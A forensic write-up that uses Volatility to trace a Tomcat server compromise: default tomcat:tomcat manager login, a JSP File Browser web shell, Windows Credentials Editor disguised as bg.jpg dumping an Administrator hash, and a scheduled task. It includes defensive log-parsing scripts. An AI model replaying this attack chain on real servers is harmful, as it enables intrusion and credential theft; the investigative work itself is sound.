Tomcat shells
Web shells memory write up
WIN-CEKM08E74HR-20150611-222930.raw
All I know is that this dump is from a machine running a web server which has been compromised. I don't know how it was compromised, nor do I have any other details about the server itself.
Identify the OS profile
Set the environment variable 'mem' to /mnt/volatility/DF/WIN-CEKM08E74HR-20150611-222930.raw
$ cd /root/volatility
$ mem=/mnt/volatility/DF/WIN-CEKM08E74HR-20150611-222930.raw
$ python vol.py -f $mem imageinfo
Volatility results
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : VistaSP1x86, Win2008SP1x86, Win2008SP2x86, VistaSP2x86
AS Layer1 : IA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/mnt/volatility/DF/WIN-CEKM08E74HR-20150611-222930.raw)
PAE type : No PAE
DTB : 0x122000L
KDBG : 0x8190ac98L
Number of Processors : 1
Image Type (Service Pack) : 2
KPCR for CPU 0 : 0x8190b800L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2015-06-11 22:29:32 UTC+0000
Image local date and time : 2015-06-11 18:29:32 -0400
It is reasonable to assume Win2008, given the 'web server' part of the challenge.
$ python vol.py -f $mem --profile=Win2008SP1x86 pslist
Processes of interest:
0x831f3d90 cmd.exe 3248 1728 0 -------- 0 0 2015-06-11 22:21:49 UTC+0000 2015-06-11 22:21:49 UTC+0000
0x8363c7f0 tasklist.exe 3256 3248 0 -------- 0 0 2015-06-11 22:21:49 UTC+0000 2015-06-11 22:21:49 UTC+0000
0x835f5718 cmd.exe 3520 1728 0 -------- 0 0 2015-06-11 22:24:04 UTC+0000 2015-06-11 22:24:04 UTC+0000
0x830e9d90 cmd.exe 3572 2032 1 17 0 0 2015-06-11 22:25:00 UTC+0000
0x8362fca0 bg.jpg 3580 3572 1 61 0 0 2015-06-11 22:25:00 UTC+0000
0x835eba10 cmd.exe 3604 1728 0 -------- 0 0 2015-06-11 22:25:15 UTC+0000 2015-06-11 22:25:15 UTC+0000
0x836407b0 cmd.exe 3612 1728 0 -------- 0 0 2015-06-11 22:25:24 UTC+0000 2015-06-11 22:25:24 UTC+0000
0x830e2d90 tasklist.exe 3620 3612 0 -------- 0 0 2015-06-11 22:25:24 UTC+0000 2015-06-11 22:25:24 UTC+0000
0x83693bc0 TrustedInstalle 2364 596 3 104 0 0 2015-06-11 22:26:34 UTC+0000
0x832e7020 csrss.exe 2664 2684 8 188 2 0 2015-06-11 22:26:55 UTC+0000
0x83125cd8 winlogon.exe 2732 2684 3 114 2 0 2015-06-11 22:26:55 UTC+0000
0x82a3f530 taskeng.exe 2448 1012 9 226 2 0 2015-06-11 22:27:17 UTC+0000
0x83681610 dwm.exe 2860 1160 3 70 2 0 2015-06-11 22:27:17 UTC+0000
0x837241d8 explorer.exe 2428 2856 17 425 2 0 2015-06-11 22:27:18 UTC+0000
0x83117020 jusched.exe 3056 2428 1 50 2 0 2015-06-11 22:27:18 UTC+0000
0x83632d08 VBoxTray.exe 3060 2428 9 228 2 0 2015-06-11 22:27:18 UTC+0000
0x83201b90 Tomcat7w.exe 2816 2428 2 50 2 0 2015-06-11 22:27:18 UTC+0000
0x83116ad8 wuauclt.exe 3360 1012 2 142 2 0 2015-06-11 22:27:32 UTC+0000
0x8311ec10 cmd.exe 4032 2428 1 19 2 0 2015-06-11 22:29:10 UTC+0000
The server appears to be a Windows 2008 box running Tomcat 7. Pull the network information.
$ python vol.py -f $mem --profile=Win2008SP1x86 netscan
0x1eda4db0 TCPv4 -:8080 58.64.141.245:1057 CLOSED 1728 Tomcat7.exe
Looks like this server is listening on 192.168.56.30. There's a remote connection associated with PID 1728 / Tomcat7.exe. This PID is also the PPID of numerous cmd.exe processes.
Let's run pstree to see the process tree (could also run pstree -v).
$ python vol.py -f $mem --profile=Win2008SP1x86 pstree
0x837241d8:explorer.exe 2428 2856 17 425 2015-06-11 22:27:18 UTC+0000
. 0x83201b90:Tomcat7w.exe 2816 2428 2 50 2015-06-11 22:27:18 UTC+0000
. 0x83117020:jusched.exe 3056 2428 1 50 2015-06-11 22:27:18 UTC+0000
. 0x8311ec10:cmd.exe 4032 2428 1 19 2015-06-11 22:29:10 UTC+0000
. 0x83139650:services.exe 596 520 6 234 2015-06-11 22:05:29 UTC+0000
.. 0x832dc560:Tomcat7.exe 1728 596 28 360 2015-06-11 22:05:56 UTC+0000
... 0x835eba10:cmd.exe 3604 1728 0 ------ 2015-06-11 22:25:15 UTC+0000
... 0x836407b0:cmd.exe 3612 1728 0 ------ 2015-06-11 22:25:24 UTC+0000
.... 0x830e2d90:tasklist.exe 3620 3612 0 ------ 2015-06-11 22:25:24 UTC+0000
... 0x831f3d90:cmd.exe 3248 1728 0 ------ 2015-06-11 22:21:49 UTC+0000
.... 0x8363c7f0:tasklist.exe 3256 3248 0 ------ 2015-06-11 22:21:49 UTC+0000
... 0x835f5718:cmd.exe 3520 1728 0 ------ 2015-06-11 22:24:04 UTC+0000
Dump Tomcat PID memory (1728)
$ python vol.py -f $mem --profile=Win2008SP1x86 memdump -p 1728 -D /mnt/volatility/DF/tomcat-dump/
Run strings over 1728.dmp to get a readable text file
$ strings -a /mnt/volatility/DF/tomcat-dump/1728.dmp > /mnt/volatility/DF/tomcat-dump/1728strings.txt
COMPUTERNAME=WIN-CEKM08E74HR
ComSpec=C:\Windows\system32\cmd.exe
DFSTRACINGON=FALSE
FP_NO_HOST_CHECK=NO
LOCALAPPDATA=C:
2\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\ProgramData\Oracle\Java\javapath;C:\Wi
:\Windows;C:\Windows\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=
ENTIFIER=x86 Family 6 Model 42 Stepping 7, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=2a07
ProgramData=C:\Program
UvDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Windows\TEMP
TMP=C:\Windows\TEMP
Format
USERDOMAIN=WORKGROUP
USERNAME=WIN-CEKM08E74HR$
USERPROFILE=C:\Windows\system32\config\systemprofile
windir=C:\Windows
"C:\Program Files\Apache Software Foundation\Tomcat 7.0\bin\Tomcat7.exe" //RS//Tomcat7
58.64.141.245 - tomcat [11/Jun/2015:18:07:04 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=262D313C4A6E085593AF3CAD4F4E7A99 HTTP/1.1" 200 158
58.64.141.245 - - [11/Jun/2015:18:07:27 -0400] "POST /webfiles/ HTTP/1.1" 200 2367
58.64.141.245 - - [11/Jun/2015:18:07:37 -0400] "POST /webfiles/ HTTP/1.1" 200 2460
58.64.141.245 - - [11/Jun/2015:18:07:51 -0400] "POST /webfiles/ HTTP/1.1" 200 2388
58.64.141.245 - - [11/Jun/2015:18:09:26 -0400] "POST /webfiles/ HTTP/1.1" 200 8973
58.64.141.245 - - [11/Jun/2015:18:12:16 -0400] "POST /webfiles/ HTTP/1.1" 200 48896
58.64.141.245 - - [11/Jun/2015:18:12:42 -0400] "POST /webfiles/ HTTP/1.1" 200 2245
58.64.141.245 - - [11/Jun/2015:18:13:16 -0400] "POST /webfiles/ HTTP/1.1" 200 2278
58.64.141.245 - - [11/Jun/2015:18:15:24 -0400] "POST /webfiles/ HTTP/1.1" 200 2261
58.64.141.245 - - [11/Jun/2015:18:15:34 -0400] "POST /webfiles/ HTTP/1.1" 200 5149
58.64.141.245 - - [11/Jun/2015:18:16:31 -0400] "POST /webfiles/ HTTP/1.1" 200 5227
58.64.141.245 - - [11/Jun/2015:18:19:52 -0400] "POST /webfiles/ HTTP/1.1" 200 5149
58.64.141.245 - - [11/Jun/2015:18:21:49 -0400] "POST /webfiles/ HTTP/1.1" 200 5227
58.64.141.245 - - [11/Jun/2015:18:24:04 -0400] "POST /webfiles/ HTTP/1.1" 200 2271
58.64.141.245 - - [11/Jun/2015:18:25:15 -0400] "POST /webfiles/ HTTP/1.1" 200 2271
58.64.141.245 - - [11/Jun/2015:18:25:25 -0400] "POST /webfiles/ HTTP/1.1" 200 5305
Looking for shells
$ cat /mnt/volatility/DF/tomcat-dump/1728strings.txt | grep -i 'post' | more
Let's see when 58.64.141.245 first accessed the web server.
58.64.141.245 - - [08/Jun/2015:19:38:44 -0400] "GET /manager/html HTTP/1.1" 401 2538
$ grep -C10 "58\.64\.141\.245" /mnt/volatility/DF/tomcat-dump/1728strings.txt
58.64.141.245 - - [11/Jun/2015:18:27:51 -0400] "GET /webfiles/?sort=1&downfile=C%3A%5Cinetpub%5Cwwwroot%5Csm.gif HTTP/1.1" 200 975 - - [11/Jun/2015:18:27:37 -0400] "GET /webfiles/?Javascript HTTP/1.1" 200 3714
58.64.141.245 - - [11/Jun/2015:18:27:44 -0400] "GET /webfiles/?sort=1&file=C%3A%5Cinetpub%5Cwwwroot%5Csm.gif HTTP/1.1" 200 972 7:34 -0400] "GET /webfiles/?Javascript HTTP/1.1" 200 3714/1.1" 200 3714 - [11/Jun/2015:18:13:43 -0400] "GET /webfiles/?sort=1&dir=C%3A%5Cinetpub%5Cwwwroot HTTP/1.1" 200 8863
58.64.141.245 - - [11/Jun/2015:18:13:43 -0400] "GET /webfiles/?Javascript HTTP/1.1" 200 3714
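Reading these access-log lines by eye works for a handful of entries; a strings dump of a busy Tomcat holds thousands. The following parser is an added example (not part of the original write-up) that turns Tomcat access-log lines in the common log format into a per-IP timeline: first and last sighting, the user the request was authenticated as, hits on /manager/html/upload, POSTs to the shell path, and the file names carried in the shell's uplMonitor / downfile query parameters. The sample lines are re-entered from those shown on this page plus one constructed benign request from another address; the shell path and parameter names are the ones the page shows, not general constants.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Sample input: access-log lines as recovered from the Tomcat7.exe strings dump
# in this write-up, plus one constructed benign request from a different client.
SAMPLE_LOG = """\
58.64.141.245 - - [08/Jun/2015:19:38:44 -0400] "GET /manager/html HTTP/1.1" 401 2538
58.64.141.245 - tomcat [11/Jun/2015:18:07:04 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=262D313C4A6E085593AF3CAD4F4E7A99 HTTP/1.1" 200 158
58.64.141.245 - - [11/Jun/2015:18:07:27 -0400] "POST /webfiles/ HTTP/1.1" 200 2367
58.64.141.245 - - [11/Jun/2015:18:12:16 -0400] "GET /webfiles/?first&uplMonitor=C%3A%5Cfakepath%5C12.bat HTTP/1.1" 200 865
58.64.141.245 - - [11/Jun/2015:18:12:16 -0400] "POST /webfiles/ HTTP/1.1" 200 48896
58.64.141.245 - - [11/Jun/2015:18:25:25 -0400] "POST /webfiles/ HTTP/1.1" 200 5305
58.64.141.245 - - [11/Jun/2015:18:27:51 -0400] "GET /webfiles/?sort=1&downfile=C%3A%5Cinetpub%5Cwwwroot%5Csm.gif HTTP/1.1" 200 975
192.168.56.1 - - [11/Jun/2015:18:00:00 -0400] "GET / HTTP/1.1" 200 7777
"""

# Common log format: client ident user [timestamp] "method target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Path of the web shell on this server (from the page); adjust per case.
SHELL_PATH = "/webfiles/"
MANAGER_UPLOAD = "/manager/html/upload"


def parse_line(line):
    """Parse one access-log line; returns a dict or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qs percent-decodes values, so C%3A%5Cfakepath becomes C:\fakepath
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def analyse(log_text, client_ip):
    """Build a timeline summary for one client address."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    mine = sorted((e for e in entries if e["ip"] == client_ip), key=lambda e: e["ts"])
    return {
        "first_seen": mine[0]["ts"] if mine else None,
        "last_seen": mine[-1]["ts"] if mine else None,
        "authenticated_as": sorted({e["user"] for e in mine if e["user"] != "-"}),
        "manager_uploads": [e["ts"] for e in mine if e["path"] == MANAGER_UPLOAD],
        "shell_posts": sum(1 for e in mine if e["method"] == "POST" and e["path"] == SHELL_PATH),
        "uploaded_files": [v for e in mine for v in e["query"].get("uplMonitor", [])],
        "downloaded_files": [v for e in mine for v in e["query"].get("downfile", [])],
    }


if __name__ == "__main__":
    summary = analyse(SAMPLE_LOG, "58.64.141.245")
    for key, value in summary.items():
        print("%-18s %s" % (key, value))
```

Feed it the real file with `analyse(open("1728strings.txt", errors="replace").read(), ip)`: lines that are not access-log entries simply fail the regex and are dropped, which is what you want when the input is a raw strings dump.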
Let's focus on the activity around 'GET /webfiles'
$ grep -C10 "GET \/webfiles" /mnt/volatility/DF/tomcat-dump/1728strings.txt
GET /webfiles/?sort=1&file=C%3A%5Cinetpub%5Cwwwroot%5Csm.gif HTTP/1.1
accept:*/**
referer:http://192.168.56.30:8080/webfiles/?sort=1&dir=C%3A%5Cinetpub%5Cwwwroott
accept-language:en-uss
user-agent:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0))
accept-encoding:gzip, deflatee
host:192.168.56.30:80800
connection:Keep-Alivee
cookie:JSESSIONID=D4BB0A17D08FE321DF87835231D798244
cookie:JSESSIONID=D4BB0A17D08FE321DF87835231D798244
0A17D08FE321DF87835231D798244
--
Accept-Encoding: gzip, deflate
Host: 192.168.56.30:8080
Connection: Keep-Alive
Cookie: JSESSIONID=983D1DF88F7A229E9D2C5DD76804F120
Authorization: Basic dG9tY2F0OnRvbWNhdA==
The Authorization header value is base64-encoded. Let's decode it.
$ echo dG9tY2F0OnRvbWNhdA== | base64 -d
tomcat:tomcat
Found interesting strings in 1728strings.txt
178956:Created by jsp File Browser v.
Let's focus on that.
179973:" <small>jsp File Browser version
179974-C by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
179975- </center>
179976-</html>
179977-java/util/zip/ZipFile
246416- <div class="formular">
246417- <form class="formular2" action="/webfiles/" enctype="multipart/form-data" method="POST">
246418- <input type="hidden" name="dir" value="C:\inetpub\wwwroot">
246419- <input type="hidden" name="sort" value="1">
246420- <input type="file" class="textfield" onKeypress="event.cancelBubble=true;" name="myFile">
246421- <input title="Upload selected file to the current working directory
246422-" type="Submit" class="button" name="Submit" value="Upload"
246423- onClick="javascript:popUp('/webfiles/')">
246424- </form>
246425- <form class="formular2" action="/webfiles/" method="POST">
246426- <input type="hidden" name="dir" value="C:\inetpub\wwwroot">
246427- <input type="hidden" name="sort" value="1">
246428- <input type="hidden" name="command" value="">
246429- <input title="Launch command in current directory" type="Submit" class="button" id="but_Lau" name="Submit" value="(L)aunch external program">
246430- </form>
246431- </div>
246432-
246433- <hr>
246434- <center>
246435: <small>jsp File Browser version 1.2 by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
246436- </center>
246437-</bo
246438-H7
246439- H7
246440- H7
246441- Wp<
246442-/manager/images/asf-logo.gif
246443-org.apache.catalina.filters.CSRF_NONCE
246444-multipart/form-data; boundary=---------------------------7df134640124
246445-/manager/images/tomcat.gif
246446-org.apache.catalina.filters.CSRF_NONCE=262D313C4A6E085593AF3CAD4F4E7A99
246447-en-us
246448-262D313C4A6E085593AF3CAD4F4E7A99
246449-W/"2066-1431019026000"
246450-36791
246451-Thu, 07 May 2015 17:17:06 GMT
246452-W/"7279-1431019026000"
246453-/manager/html/upload
246454-/manager/html
248751-/webfiles/tml/uploadlogo.gif
248752-sort=1&file=C:\inetpub\wwwroot\sm.gif5Csm.gif3C4A6E085593AF3CAD4F4E7A99
248753-HTTP/1.1 200 OK
248754-Server: Apache-Coyote/1.1
248755-Content-Disposition: inline;filename="sm.gif"
248756-Content-Type: image/gif;charset=ISO-8859-1
248757-Content-Length: 97
248758-Date: Thu, 11 Jun 2015 22:27:44 GMT
248759-Administrator:WIN-CEKM08E74HR:A15153D335C2751F17306D272A9441BB:835FD21AAC32076DF24DC75E0C77144F
248760-pe="hidden" name="dir" value="C:\inetpub\wwwroot">
248761- <input type="hidden" name="sort" value="1">
248762- <input type="hidden" name="command" value="">
248763- <input title="Launch command in current directory" type="Submit" class="button" id="but_Lau" name="Submit" value="(L)aunch external program">
248764- </form>
248765- </div>
248766-
248767- <hr>
248768- <center>
248769: <small>jsp File Browser version 1.2 by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
38887- out.write("\t\t<input type=\"hidden\" name=\"command\" value=\"\">\n");
38888- out.write("\t\t<input title=\"Launch command in current directory\" type=\"Submit\" class=\"button\" id=\"but_Lau\" name=\"Submit\" value=\"");
65343- out.write("\t\t<input type=\"hidden\" name=\"command\" value=\"\">\n");
65344- out.write("\t\t<input title=\"Launch command in current directory\" type=\"Submit\" class=\"button\" id=\"but_Lau\" name=\"Submit\" value=\"");
Let's find this shell.
58.64.141.245 - - [11/Jun/2015:18:12:18 -0400] "GET /webfiles/?uplMonitor=C%3A%5Cfakepath%5C12.bat HTTP/1.1" 200 574
$ cat /mnt/volatility/DF/tomcat-dump/1728strings.txt | grep -i '\.bat'
<snip>
at 18:25 c:\windows\12.bat
first&uplMonitor=C%3A%5Cfakepath%5C12.bat
Javascriptonitor=C:\fakepath\12.bat12.bat
C:\fakepath\12.bat
Content-Disposition: form-data; name="myFile"; filename="12.bat"
uplMonitor=C%3A%5Cfakepath%5C12.bat
Javascript=C:\inetpub\wwwrootwwroot12.bat
uplMonitor=C%3A%5Cfakepath%5C12.bat
at 18:25 c:\windows\12.bat
first&uplMonitor=C%3A%5Cfakepath%5C12.bat
C:\fakepath\12.bat
<snip>
GET /webfiles/?first&uplMonitor=C%3A%5Cfakepath%5C12.bat HTTP/1.1
Content-Disposition: form-data; name="myFile"; filename="12.bat"
<snip>
58.64.141.245 - - [11/Jun/2015:18:12:16 -0400] "GET /webfiles/?first&uplMonitor=C%3A%5Cfakepath%5C12.bat HTTP/1.1" 200 865
58.64.141.245 - - [11/Jun/2015:18:12:18 -0400] "GET /webfiles/?uplMonitor=C%3A%5Cfakepath%5C12.bat HTTP/1.1" 200 574
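The three things that pinned the shell down above (a Basic-auth header decoding to default credentials, the jsp File Browser banner and its "Launch command" form, and the multipart upload of 12.bat) can be pulled out of a strings dump in one pass. The scanner below is an added example, not code from the write-up: it decodes every `Authorization: Basic` token it finds (skipping malformed base64 rather than crashing), checks the pair against a small illustrative list of credential pairs that ship as examples in Tomcat's tomcat-users.xml and manager documentation, counts shell signature strings, and collects uploaded file names from Content-Disposition and uplMonitor. The sample text is a constructed excerpt of 1728strings.txt built from the lines shown on this page, with one malformed header and one unrelated line added so the filters have something to reject.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed excerpt standing in for 1728strings.txt (lines from the write-up,
# plus a malformed Authorization header and an unrelated line).
SAMPLE_STRINGS = """\
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Authorization: Basic not*base64
Cookie: JSESSIONID=983D1DF88F7A229E9D2C5DD76804F120
178956:Created by jsp File Browser v.
<small>jsp File Browser version 1.2 by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
<input type="hidden" name="command" value="">
<input title="Launch command in current directory" type="Submit" class="button" id="but_Lau" name="Submit" value="(L)aunch external program">
Content-Disposition: form-data; name="myFile"; filename="12.bat"
GET /webfiles/?first&uplMonitor=C%3A%5Cfakepath%5C12.bat HTTP/1.1
java/util/zip/ZipFile
"""

# Illustrative list only: example pairs from Tomcat's shipped tomcat-users.xml
# comments and manager docs. Extend with the list used in your environment.
DEFAULT_CREDS = {("tomcat", "tomcat"), ("tomcat", "s3cret"), ("both", "tomcat"),
                 ("role1", "tomcat"), ("admin", "admin")}

BASIC_RE = re.compile(r"Authorization:\s*Basic\s+(\S+)", re.I)
SIGNATURES = {
    "jsp File Browser banner": re.compile(r"jsp File Browser", re.I),
    "command-launch form": re.compile(r'name="command"|Launch command in current directory', re.I),
}
UPLOAD_RE = re.compile(r'Content-Disposition:\s*form-data;.*?filename="([^"]*)"', re.I)
UPLMON_RE = re.compile(r'uplMonitor=([^&\s"]+)')


def decode_basic(token):
    """Decode one Basic token to (user, password); None if it is not valid base64 or has no ':'."""
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if ":" not in raw:
        return None
    user, password = raw.split(":", 1)
    return user, password


def scan(strings_text):
    """Walk a strings dump line by line and collect web-shell indicators."""
    report = {
        "basic_auth": [],
        "signatures": {name: 0 for name in SIGNATURES},
        "upload_filenames": [],
        "upload_monitor_paths": [],
    }
    for lineno, line in enumerate(strings_text.splitlines(), 1):
        m = BASIC_RE.search(line)
        if m:
            creds = decode_basic(m.group(1))
            if creds:
                report["basic_auth"].append({
                    "line": lineno, "user": creds[0], "password": creds[1],
                    "default": creds in DEFAULT_CREDS,
                })
        for name, rx in SIGNATURES.items():
            if rx.search(line):
                report["signatures"][name] += 1
        m = UPLOAD_RE.search(line)
        if m:
            report["upload_filenames"].append(m.group(1))
        m = UPLMON_RE.search(line)
        if m:
            report["upload_monitor_paths"].append(unquote(m.group(1)))
    return report


if __name__ == "__main__":
    for key, value in scan(SAMPLE_STRINGS).items():
        print("%-22s %s" % (key, value))
```

Run it as `scan(open("1728strings.txt", errors="replace").read())`; the line numbers in the report line up with `grep -n` output, so each hit can be inspected in context with `grep -C10`.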
Right. C:\fakepath\12.bat: 'fakepath' is the placeholder browsers substitute for the client-side directory of a file input, so the name that matters is 12.bat. Let's dump this batch script.
$ python vol.py -f $mem --profile=Win2008SP1x86 filescan | grep -i "12\.bat"
Volatility Foundation Volatility Framework 2.6.1
0x000000001ee373f8 8 0 -W-rw- \Device\HarddiskVolume1\Windows\12.bat
$ python vol.py -f $mem --profile=Win2008SP1x86 dumpfiles -Q 0x000000001ee373f8 -D /mnt/volatility/DF/tomcat-dump/
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x1ee373f8 None \Device\HarddiskVolume1\Windows\12.bat
Examine 12.bat
$ cat /mnt/volatility/DF/tomcat-dump/file.None.0x8362e730.dat
@echo off
c:\inetpub\wwwroot\bg.jpg -e -o c:\inetpub\wwwroot\sm.gif
pstree verbose
$ python vol.py -f $mem --profile=Win2008SP1x86 pstree -v
..... 0x8362fca0:bg.jpg 3580 3572 1 61 2015-06-11 22:25:00 UTC+0000
audit: \Device\HarddiskVolume1\inetpub\wwwroot\bg.jpg
cmd: c:\inetpub\wwwroot\bg.jpg -e -o c:\inetpub\wwwroot\sm.gif
path: c:\inetpub\wwwroot\bg.jpg
Let's determine what bg.jpg actually is
$ python vol.py -f $mem --profile=Win2008SP1x86 filescan | grep -i 'bg\.jpg'
Volatility Foundation Volatility Framework 2.6.1
0x000000001ede1ba0 8 0 -W-rw- \Device\HarddiskVolume1\inetpub\wwwroot\bg.jpg
0x000000001f2dc170 7 0 R--r-d \Device\HarddiskVolume1\inetpub\wwwroot\bg.jpg
$ sha1sum /mnt/volatility/DF/tomcat-dump/file.*
c0d7899cc49bf2cb4f3abe663dc6a62ed69c06ff /mnt/volatility/DF/tomcat-dump/file.None.0x832c0680.dat
26019082706f9898a716d8803f57cc70365c821b /mnt/volatility/DF/tomcat-dump/file.None.0x8362fb20.img
$ strings file.None.0x8362fb20.img
WCE %s (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Options:
-l List logon sessions and NTLM credentials (default).
Optional: -r<refresh interval>.
-s Changes NTLM credentials of current logon session.
Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
-o saves all output to a file.
-r Lists logon sessions and NTLM credentials indefinitely.
Refreshes every 5 seconds if new sessions are found.
-c Run <cmd> in a new session with the specified NTLM credentials.
Parameters: <cmd>.
-e Lists logon sessions NTLM credentials indefinitely.
Refreshes every time a logon event occurs.
Parameters: <filename>.
-i Specify LUID instead of use current logon session.
Parameters: <luid>.
-d Delete NTLM credentials from logon session.
Parameters: <luid>.
-a Use Addresses.
Parameters: <addresses>
-f Force 'safe mode'.
-g Generate LM & NT Hash.
Parameters: <password>.
-K Dump Kerberos tickets to file (unix & 'windows wce' format)
Error in cmdline!. Bye!.
-k Read Kerberos tickets from file and insert into Windows cache
username wrong format!.
-w Dump cleartext passwords stored by the digest authentication package
-v verbose output.
So it's Windows Credentials Editor (WCE): -e dumps the logon session NTLM credentials and -o writes the output to a file. Review sm.gif.
$ python vol.py -f $mem --profile=Win2008SP1x86 filescan | grep -i 'sm\.gif'
Volatility Foundation Volatility Framework 2.6.1
0x000000001edf6640 1 0 R--rw- \Device\HarddiskVolume1\inetpub\wwwroot\sm.gif
$ python vol.py -f $mem --profile=Win2008SP1x86 dumpfiles -Q 0x000000001edf6640 -D /mnt/volatility/DF/tomcat-dump/wce
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x1edf6640 None \Device\HarddiskVolume1\inetpub\wwwroot\sm.gif
$ strings /mnt/volatility/DF/tomcat-dump/wce/file.None.0x830f1448.dat
Administrator:WIN-CEKM08E74HR:A15153D335C2751F17306D272A9441BB:835FD21AAC32076DF24DC75E0C77144F
Identifying tasks
$ python vol.py -f $mem --profile=Win2008SP1x86 filescan | grep -i 'tasks'
Volatility Foundation Volatility Framework 2.6.1
0x000000001ee03280 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
0x000000001ee49ba8 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask
0x000000001f122450 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\TextServicesFramework\MsCtfMonitor
0x000000001f127f80 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\Multimedia\SystemSoundsService
0x000000001f1e8bd8 17 1 RW-r-- \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Operational.evtx
0x000000001f1eb750 8 0 -W-r-- \Device\HarddiskVolume1\Windows\System32\Tasks\At1
0x000000001f22da78 10 1 RW-r-- \Device\HarddiskVolume1\Windows\Tasks\SCHEDLGU.TXT
0x000000001f22e9c8 6 1 R--rw- \Device\HarddiskVolume1\Windows\Tasks
0x000000001f231b18 2 0 R--r-d \Device\HarddiskVolume1\Windows\System32\taskschd.dll
0x000000001f2638d0 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\PLA\System\ConvertLogEntries
*0x000000001f297ad8 8 0 -W-r-d \Device\HarddiskVolume1\Windows\Tasks\At1.job*
0x000000001f2e7ed0 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\Server Manager\ServerManager
$ python vol.py -f $mem --profile=Win2008SP1x86 dumpfiles -Q 0x000000001f297ad8 -D /mnt/volatility/DF/tomcat-dump/tasks
$ strings -el /mnt/volatility/DF/tomcat-dump/tasks/file.None.0x8363fd10.dat
c:\windows\12.bat
SYSTEM
Created by NetScheduleJobAdd.
$ xxd /mnt/volatility/DF/tomcat-dump/tasks/file.None.0x8363fd10.dat
00000000: 0006 0100 7cbf 6c48 bcaa 564e 928f 06eb ....|.lH..VN....
00000010: 7057 4ccb 4600 ca00 0000 0000 3c00 0a00 pWL.F.......<...
00000020: 2000 0000 0014 730f 0000 0000 0113 0400 .....s.........
00000030: 0200 e021 df07 0600 0400 0b00 1200 1900 ...!............
00000040: 0000 1c00 0100 1200 6300 3a00 5c00 7700 ........c.:.\.w.
00000050: 6900 6e00 6400 6f00 7700 7300 5c00 3100 i.n.d.o.w.s.\.1.
00000060: 3200 2e00 6200 6100 7400 0000 0000 0000 2...b.a.t.......
00000070: 0700 5300 5900 5300 5400 4500 4d00 0000 ..S.Y.S.T.E.M...
00000080: 1e00 4300 7200 6500 6100 7400 6500 6400 ..C.r.e.a.t.e.d.
00000090: 2000 6200 7900 2000 4e00 6500 7400 5300 .b.y. .N.e.t.S.
000000a0: 6300 6800 6500 6400 7500 6c00 6500 4a00 c.h.e.d.u.l.e.J.
000000b0: 6f00 6200 4100 6400 6400 2e00 0000 0000 o.b.A.d.d.......
000000c0: 0800 0000 0000 0000 0000 0100 3000 0000 ............0...
000000d0: df07 0600 0b00 0000 0000 0000 1200 1900 ................
000000e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000f0: 0000 0000 0000 0000 0000 0000 0100 0100 ................
00000100: 3c56 fcbd fe46 561b 1843 6c37 2c42 d847 <V...FV..Cl7,B.G
00000110: 8146 13f0 4dc0 8ca1 6385 9699 3525 f122 .F..M...c...5%."
00000120: a49a 20ed 4b99 5850 df79 17f8 0f16 4777 .. .K.XP.y....Gw
00000130: b394 0b70 a307 7bd4 993b a5d4 71a0 0a19 ...p..{..;..q...
Dump the Security log to identify who created the scheduled task
$ python vol.py -f $mem --profile=Win2008SP1x86 filescan | grep -i 'security'
Volatility Foundation Volatility Framework 2.6.1
0x000000001ee09960 3 1 RW---- \Device\HarddiskVolume1\Windows\System32\config\RegBack\SECURITY
0x000000001f091600 11 1 RW---- \Device\HarddiskVolume1\Windows\System32\config\SECURITY
0x000000001f1ed2c0 13 1 RW-r-- \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Security.evtx
0x000000001fa06ed8 1 1 RW---- \Device\HarddiskVolume1\Windows\System32\config\SECURITY.LOG1
